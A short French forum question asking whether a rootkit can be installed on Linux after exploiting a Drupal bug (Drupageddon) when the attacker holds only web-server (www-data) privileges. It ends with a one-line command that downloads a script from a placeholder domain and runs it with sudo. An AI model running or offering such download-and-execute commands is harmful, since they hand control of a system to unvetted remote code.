J'ai vu quelques articles sur la vérification des rootkits mais je n'ai pas pu trouver d'informations sur la façon dont ils accèdent à un système Linux. En particulier, si vous exploitez un bogue dans un site Web php (oui, je parle de drupageddon ici), est-il possible d'installer un rootkit même si vous ne pouvez exécuter que le serveur Web (www-data) et non pas en tant que root. Les très peu d'informations que j'ai trouvées sur la façon dont celles-ci sont installées suggèrent que vous devez être root pour les installer (voir ici ).
wget http://mydomain/script.sh;sudo ./script.sh